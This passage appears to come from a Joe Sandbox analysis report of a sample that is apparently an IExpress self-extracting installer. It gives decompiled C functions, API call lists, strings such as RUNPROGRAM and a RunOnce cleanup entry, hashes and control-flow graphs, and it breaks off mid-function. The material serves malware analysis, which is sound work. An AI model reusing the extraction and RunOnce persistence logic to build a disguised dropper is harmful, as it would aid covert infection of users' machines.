                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                      • API String ID: 178549006-850274211
                                                                      • Opcode ID: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                      • Instruction ID: 6b316da6f59a7a3cf4263eab61548626dd7e162b3abf940f31fbbe296dc1fa0f
                                                                      • Opcode Fuzzy Hash: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                      • Instruction Fuzzy Hash: 1F511572A00218ABEB20BF60DC4DFFB777CEB40750F1401A9FA05E7151DA75AE45AB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph for function f855a0 (legend: Executed / Not Executed)
                                                                      C-Code - Quality: 92%
                                                                      			E00F855A0(void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v265;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				int _t32;
                                                                      				int _t33;
                                                                      				int _t35;
                                                                      				signed int _t36;
                                                                      				signed int _t38;
                                                                      				int _t40;
                                                                      				int _t44;
                                                                      				long _t48;
                                                                      				int _t49;
                                                                      				int _t50;
                                                                      				signed int _t53;
                                                                      				int _t54;
                                                                      				int _t59;
                                                                      				char _t60;
                                                                      				int _t65;
                                                                      				char _t66;
                                                                      				int _t67;
                                                                      				int _t68;
                                                                      				int _t69;
                                                                      				int _t70;
                                                                      				int _t71;
                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                      				int _t73;
                                                                      				CHAR* _t82;
                                                                      				CHAR* _t88;
                                                                      				void* _t103;
                                                                      				signed int _t110;
                                                                      
                                                                      				_t28 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t28 ^ _t110;
                                                                      				_t2 = E00F8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                      				if(_t109 != 0) {
                                                                      					_t82 = "RUNPROGRAM";
                                                                      					_t32 = E00F8468F(_t82, _t109, 1);
                                                                      					__eflags = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                      						__eflags = _t33;
                                                                      						if(_t33 == 0) {
                                                                      							 *0xf89a30 = 1;
                                                                      						}
                                                                      						LocalFree(_t109);
                                                                      						_t35 =  *0xf88b3e; // 0x0
                                                                      						__eflags = _t35;
                                                                      						if(_t35 == 0) {
                                                                      							__eflags =  *0xf88a24; // 0x0
                                                                      							if(__eflags != 0) {
                                                                      								L46:
                                                                      								_t101 = 0x7d2;
                                                                      								_t36 = E00F86517(_t82, 0x7d2, 0, E00F83210, 0, 0);
                                                                      								asm("sbb eax, eax");
                                                                      								_t38 =  ~( ~_t36);
                                                                      							} else {
                                                                      								__eflags =  *0xf89a30; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									goto L46;
                                                                      								} else {
                                                                      									_t109 = 0xf891e4;
                                                                      									_t40 = GetTempPathA(0x104, 0xf891e4); // executed
                                                                      									__eflags = _t40;
                                                                      									if(_t40 == 0) {
                                                                      										L19:
                                                                      										_push(_t82);
                                                                      										E00F81781( &_v268, 0x104, _t82, "A:\\");
                                                                      										__eflags = _v268 - 0x5a;
                                                                      										if(_v268 <= 0x5a) {
                                                                      											do {
                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                      												__eflags = _t109 - 6;
                                                                      												if(_t109 == 6) {
                                                                      													L22:
                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                      													__eflags = _t48 - 0xffffffff;
                                                                      													if(_t48 != 0xffffffff) {
                                                                      														goto L30;
                                                                      													} else {
                                                                      														goto L23;
                                                                      													}
                                                                      												} else {
                                                                      													__eflags = _t109 - 3;
                                                                      													if(_t109 != 3) {
                                                                      														L23:
                                                                      														__eflags = _t109 - 2;
                                                                      														if(_t109 != 2) {
                                                                      															L28:
                                                                      															_t66 = _v268;
                                                                      															goto L29;
                                                                      														} else {
                                                                      															_t66 = _v268;
                                                                      															__eflags = _t66 - 0x41;
                                                                      															if(_t66 == 0x41) {
                                                                      																L29:
                                                                      																_t60 = _t66 + 1;
                                                                      																_v268 = _t60;
                                                                      																goto L42;
                                                                      															} else {
                                                                      																__eflags = _t66 - 0x42;
                                                                      																if(_t66 == 0x42) {
                                                                      																	goto L29;
                                                                      																} else {
                                                                      																	_t68 = E00F86952( &_v268);
                                                                      																	__eflags = _t68;
                                                                      																	if(_t68 == 0) {
                                                                      																		goto L28;
                                                                      																	} else {
                                                                      																		__eflags = _t68 - 0x19000;
                                                                      																		if(_t68 >= 0x19000) {
                                                                      																			L30:
                                                                      																			_push(0);
                                                                      																			_t103 = 3;
                                                                      																			_t49 = E00F8597D( &_v268, _t103, 1);
                                                                      																			__eflags = _t49;
                                                                      																			if(_t49 != 0) {
                                                                      																				L33:
                                                                      																				_t50 = E00F82630(0,  &_v268, 1);
                                                                      																				__eflags = _t50;
                                                                      																				if(_t50 != 0) {
                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                      																				}
                                                                      																				_t88 =  &_v268;
                                                                      																				E00F8658A(_t88, 0x104, "msdownld.tmp");
                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                      																				if(_t53 != 0xffffffff) {
                                                                      																					_t54 = _t53 & 0x00000010;
                                                                      																					__eflags = _t54;
                                                                      																				} else {
                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                      																				}
                                                                      																				__eflags = _t54;
                                                                      																				if(_t54 != 0) {
                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                      																					_push(_t88);
                                                                      																					_t109 = 0xf891e4;
                                                                      																					E00F81781(0xf891e4, 0x104, _t88,  &_v268);
                                                                      																					_t101 = 1;
                                                                      																					_t59 = E00F85467(0xf891e4, 1, 0);
                                                                      																					__eflags = _t59;
                                                                      																					if(_t59 != 0) {
                                                                      																						goto L45;
                                                                      																					} else {
                                                                      																						_t60 = _v268;
                                                                      																						goto L42;
                                                                      																					}
                                                                      																				} else {
                                                                      																					_t60 = _v268 + 1;
                                                                      																					_v265 = 0;
                                                                      																					_v268 = _t60;
                                                                      																					goto L42;
                                                                      																				}
                                                                      																			} else {
                                                                      																				_t65 = E00F82630(0,  &_v268, 1);
                                                                      																				__eflags = _t65;
                                                                      																				if(_t65 != 0) {
                                                                      																					goto L28;
                                                                      																				} else {
                                                                      																					_t67 = E00F8597D( &_v268, 1, 1, 0);
                                                                      																					__eflags = _t67;
                                                                      																					if(_t67 == 0) {
                                                                      																						goto L28;
                                                                      																					} else {
                                                                      																						goto L33;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		} else {
                                                                      																			goto L28;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      												goto L47;
                                                                      												L42:
                                                                      												__eflags = _t60 - 0x5a;
                                                                      											} while (_t60 <= 0x5a);
                                                                      										}
                                                                      										goto L43;
                                                                      									} else {
                                                                      										_t101 = 1;
                                                                      										_t69 = E00F85467(0xf891e4, 1, 3); // executed
                                                                      										__eflags = _t69;
                                                                      										if(_t69 != 0) {
                                                                      											goto L45;
                                                                      										} else {
                                                                      											_t82 = 0xf891e4;
                                                                      											_t70 = E00F82630(0, 0xf891e4, 1);
                                                                      											__eflags = _t70;
                                                                      											if(_t70 != 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												_t101 = 1;
                                                                      												_t82 = 0xf891e4;
                                                                      												_t71 = E00F85467(0xf891e4, 1, 1);
                                                                      												__eflags = _t71;
                                                                      												if(_t71 != 0) {
                                                                      													goto L45;
                                                                      												} else {
                                                                      													do {
                                                                      														goto L19;
                                                                      														L43:
                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                      														_push(4);
                                                                      														_t101 = 3;
                                                                      														_t82 =  &_v268;
                                                                      														_t44 = E00F8597D(_t82, _t101, 1);
                                                                      														__eflags = _t44;
                                                                      													} while (_t44 != 0);
                                                                      													goto L2;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							__eflags = _t35 - 0x5c;
                                                                      							if(_t35 != 0x5c) {
                                                                      								L10:
                                                                      								_t72 = 1;
                                                                      							} else {
                                                                      								__eflags =  *0xf88b3f - _t35; // 0x0
                                                                      								_t72 = 0;
                                                                      								if(__eflags != 0) {
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      							_t101 = 0;
                                                                      							_t73 = E00F85467(0xf88b3e, 0, _t72);
                                                                      							__eflags = _t73;
                                                                      							if(_t73 != 0) {
                                                                      								L45:
                                                                      								_t38 = 1;
                                                                      							} else {
                                                                      								_t101 = 0x4be;
                                                                      								E00F844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t101 = 0x4b1;
                                                                      						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						LocalFree(_t109);
                                                                      						 *0xf89124 = 0x80070714;
                                                                      						goto L2;
                                                                      					}
                                                                      				} else {
                                                                      					_t101 = 0x4b5;
                                                                      					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					L2:
                                                                      					_t38 = 0;
                                                                      				}
                                                                      				L47:
                                                                      				return E00F86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00F855CF
                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F85638
                                                                      • LocalFree.KERNEL32(00000000), ref: 00F8564C
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85620
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      • GetTempPathA.KERNELBASE(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F856B9
                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F8571E
                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F85737
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F857CD
                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F857EF
                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F85802
                                                                        • Part of subcall function 00F82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00F82654
                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F85830
                                                                        • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                        • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                        • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                        • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F85878
                                                                        • Part of subcall function 00F8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                        • Part of subcall function 00F8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                      • API String ID: 2436801531-337015389
                                                                      • Opcode ID: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                      • Instruction ID: e9d0b85950076327f5867745168dc9044b6e566591497be0af7a2b04e7a98adc
                                                                      • Opcode Fuzzy Hash: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                      • Instruction Fuzzy Hash: 95814C71E04A099BEB20BB708C85BFE72AD9F50B50F4401A6F586D6191EF78CDC6BB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 324 f8597d-f859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 f859bb-f859d8 call f844b9 call f86285 324->325 326 f859dd-f85a1b GetDiskFreeSpaceA 324->326 343 f85c05-f85c14 call f86ce0 325->343 328 f85ba1-f85bde memset call f86285 GetLastError FormatMessageA 326->328 329 f85a21-f85a4a MulDiv 326->329 339 f85be3-f85bfc call f844b9 SetCurrentDirectoryA 328->339 329->328 332 f85a50-f85a6c GetVolumeInformationA 329->332 335 f85a6e-f85ab0 memset call f86285 GetLastError FormatMessageA 332->335 336 f85ab5-f85aca SetCurrentDirectoryA 332->336 335->339 337 f85acc-f85ad1 336->337 341 f85ae2-f85ae4 337->341 342 f85ad3-f85ad8 337->342 351 f85c02 339->351 348 f85ae6 341->348 349 f85ae7-f85af8 341->349 342->341 346 f85ada-f85ae0 342->346 346->337 346->341 348->349 353 f85af9-f85afb 349->353 354 f85c04 351->354 355 f85afd-f85b03 353->355 356 f85b05-f85b08 353->356 354->343 355->353 355->356 357 f85b0a-f85b1b call f844b9 356->357 358 f85b20-f85b27 356->358 357->351 360 f85b29-f85b33 358->360 361 f85b52-f85b5b 358->361 360->361 364 f85b35-f85b50 360->364 362 f85b62-f85b6d 361->362 365 f85b6f-f85b74 362->365 366 f85b76-f85b7d 362->366 364->362 367 f85b85 365->367 368 f85b7f-f85b81 366->368 369 f85b83 366->369 370 f85b96-f85b9f 367->370 371 f85b87-f85b94 call f8268b 367->371 368->367 369->367 370->354 371->354
                                                                      C-Code - Quality: 96%
                                                                      			E00F8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				char _v16;
                                                                      				char _v276;
                                                                      				char _v788;
                                                                      				long _v792;
                                                                      				long _v796;
                                                                      				long _v800;
                                                                      				signed int _v804;
                                                                      				long _v808;
                                                                      				int _v812;
                                                                      				long _v816;
                                                                      				long _v820;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				signed int _t46;
                                                                      				int _t50;
                                                                      				signed int _t55;
                                                                      				void* _t66;
                                                                      				int _t69;
                                                                      				signed int _t73;
                                                                      				signed short _t78;
                                                                      				signed int _t87;
                                                                      				signed int _t101;
                                                                      				int _t102;
                                                                      				unsigned int _t103;
                                                                      				unsigned int _t105;
                                                                      				signed int _t111;
                                                                      				long _t112;
                                                                      				signed int _t116;
                                                                      				CHAR* _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      
                                                                      				_t114 = __edi;
                                                                      				_t46 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t46 ^ _t120;
                                                                      				_v804 = __edx;
                                                                      				_t118 = __ecx;
                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                      				if(_t50 != 0) {
                                                                      					_push(__edi);
                                                                      					_v796 = 0;
                                                                      					_v792 = 0;
                                                                      					_v800 = 0;
                                                                      					_v808 = 0;
                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                      					__eflags = _t55;
                                                                      					if(_t55 == 0) {
                                                                      						L29:
                                                                      						memset( &_v788, 0, 0x200);
                                                                      						 *0xf89124 = E00F86285();
                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      						_t110 = 0x4b0;
                                                                      						L30:
                                                                      						__eflags = 0;
                                                                      						E00F844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                      						SetCurrentDirectoryA( &_v276);
                                                                      						L31:
                                                                      						_t66 = 0;
                                                                      						__eflags = 0;
                                                                      						L32:
                                                                      						_pop(_t114);
                                                                      						goto L33;
                                                                      					}
                                                                      					_t69 = _v792 * _v796;
                                                                      					_v812 = _t69;
                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                      					__eflags = _t116;
                                                                      					if(_t116 == 0) {
                                                                      						goto L29;
                                                                      					}
                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                      					__eflags = _t73;
                                                                      					if(_t73 != 0) {
                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                      						_t101 =  &_v16;
                                                                      						_t111 = 6;
                                                                      						_t119 = _t118 - _t101;
                                                                      						__eflags = _t119;
                                                                      						while(1) {
                                                                      							_t22 = _t111 - 4; // 0x2
                                                                      							__eflags = _t22;
                                                                      							if(_t22 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                      							__eflags = _t87;
                                                                      							if(_t87 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							 *_t101 = _t87;
                                                                      							_t101 = _t101 + 1;
                                                                      							_t111 = _t111 - 1;
                                                                      							__eflags = _t111;
                                                                      							if(_t111 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t111;
                                                                      						if(_t111 == 0) {
                                                                      							_t101 = _t101 - 1;
                                                                      							__eflags = _t101;
                                                                      						}
                                                                      						 *_t101 = 0;
                                                                      						_t112 = 0x200;
                                                                      						_t102 = _v812;
                                                                      						_t78 = 0;
                                                                      						_t118 = 8;
                                                                      						while(1) {
                                                                      							__eflags = _t102 - _t112;
                                                                      							if(_t102 == _t112) {
                                                                      								break;
                                                                      							}
                                                                      							_t112 = _t112 + _t112;
                                                                      							_t78 = _t78 + 1;
                                                                      							__eflags = _t78 - _t118;
                                                                      							if(_t78 < _t118) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t78 - _t118;
                                                                      						if(_t78 != _t118) {
                                                                      							__eflags =  *0xf89a34 & 0x00000008;
                                                                      							if(( *0xf89a34 & 0x00000008) == 0) {
                                                                      								L20:
                                                                      								_t103 =  *0xf89a38; // 0x0
                                                                      								_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                      								L21:
                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                      									__eflags = _v804 & 0x00000001;
                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                      										__eflags = _t103 - _t116;
                                                                      									} else {
                                                                      										__eflags = _t110 - _t116;
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                      								}
                                                                      								if(__eflags <= 0) {
                                                                      									 *0xf89124 = 0;
                                                                      									_t66 = 1;
                                                                      								} else {
                                                                      									_t66 = E00F8268B(_a4, _t110, _t103,  &_v16);
                                                                      								}
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _v816 & 0x00008000;
                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t105 =  *0xf89a38; // 0x0
                                                                      							_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                      							_t103 = (_t105 >> 2) +  *0xf89a38;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t110 = 0x4c5;
                                                                      						E00F844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                      						goto L31;
                                                                      					}
                                                                      					memset( &_v788, 0, 0x200);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      					_t110 = 0x4f9;
                                                                      					goto L30;
                                                                      				} else {
                                                                      					_t110 = 0x4bc;
                                                                      					E00F844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					_t66 = 0;
                                                                      					L33:
                                                                      					return E00F86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F85A13
                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00F85A40
                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F85A64
                                                                      • memset.MSVCRT ref: 00F85A7C
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F85A98
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F85AA5
                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F85BFC
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                      • String ID:
                                                                      • API String ID: 4237285672-0
                                                                      • Opcode ID: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                      • Instruction ID: ce33b91b0c74f9c25942b46efbaf9f788e2146554266ef4d571621944daf9692
                                                                      • Opcode Fuzzy Hash: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                      • Instruction Fuzzy Hash: 8D71A2B1A0061CAFEB15EB64CCC5BFA77ACEB48750F5440AAF505D6140DA749E85AF20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 374 f84fe0-f8501a call f8468f FindResourceA LoadResource LockResource 377 f85020-f85027 374->377 378 f85161-f85163 374->378 379 f85029-f85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 f85057-f8505e call f84efd 377->380 379->380 383 f8507c-f850b4 380->383 384 f85060-f85077 call f844b9 380->384 388 f850e8-f85104 call f844b9 383->388 389 f850b6-f850da 383->389 390 f85107-f8510e 384->390 402 f85106 388->402 401 f850dc 389->401 389->402 392 f8511d-f8511f 390->392 393 f85110-f85117 FreeResource 390->393 396 f8513a-f85141 392->396 397 f85121-f85127 392->397 393->392 399 f8515f 396->399 400 f85143-f8514a 396->400 397->396 398 f85129-f85135 call f844b9 397->398 398->396 399->378 400->399 404 f8514c-f85159 SendMessageA 400->404 405 f850e3-f850e6 401->405 402->390 404->399 405->388 405->402
                                                                      C-Code - Quality: 77%
                                                                      			E00F84FE0(void* __edi, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* _t8;
                                                                      				struct HWND__* _t9;
                                                                      				int _t10;
                                                                      				void* _t12;
                                                                      				struct HWND__* _t24;
                                                                      				struct HWND__* _t27;
                                                                      				intOrPtr _t29;
                                                                      				void* _t33;
                                                                      				int _t34;
                                                                      				CHAR* _t36;
                                                                      				int _t37;
                                                                      				intOrPtr _t47;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t36 = "CABINET";
                                                                      				 *0xf89144 = E00F8468F(_t36, 0, 0);
                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                      				 *0xf89140 = _t8;
                                                                      				if(_t8 == 0) {
                                                                      					return _t8;
                                                                      				}
                                                                      				_t9 =  *0xf88584; // 0x0
                                                                      				if(_t9 != 0) {
                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                      					ShowWindow(GetDlgItem( *0xf88584, 0x841), 5);
                                                                      				}
                                                                      				_t10 = E00F84EFD(0, 0);
                                                                      				if(_t10 != 0) {
                                                                      					__imp__#20(E00F84CA0, E00F84CC0, E00F84980, E00F84A50, E00F84AD0, E00F84B60, E00F84BC0, 1, 0xf89148, _t33);
                                                                      					_t34 = _t10;
                                                                      					if(_t34 == 0) {
                                                                      						L8:
                                                                      						_t29 =  *0xf89148; // 0x0
                                                                      						_t24 =  *0xf88584; // 0x0
                                                                      						E00F844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                      						_t37 = 0;
                                                                      						L9:
                                                                      						goto L10;
                                                                      					}
                                                                      					__imp__#22(_t34, "*MEMCAB", 0xf81140, 0, E00F84CD0, 0, 0xf89140); // executed
                                                                      					_t37 = _t10;
                                                                      					if(_t37 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					__imp__#23(_t34); // executed
                                                                      					if(_t10 != 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L8;
                                                                      				} else {
                                                                      					_t27 =  *0xf88584; // 0x0
                                                                      					E00F844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                      					_t37 = 0;
                                                                      					L10:
                                                                      					_t12 =  *0xf89140; // 0x0
                                                                      					if(_t12 != 0) {
                                                                      						FreeResource(_t12);
                                                                      						 *0xf89140 = 0;
                                                                      					}
                                                                      					if(_t37 == 0) {
                                                                      						_t47 =  *0xf891d8; // 0x0
                                                                      						if(_t47 == 0) {
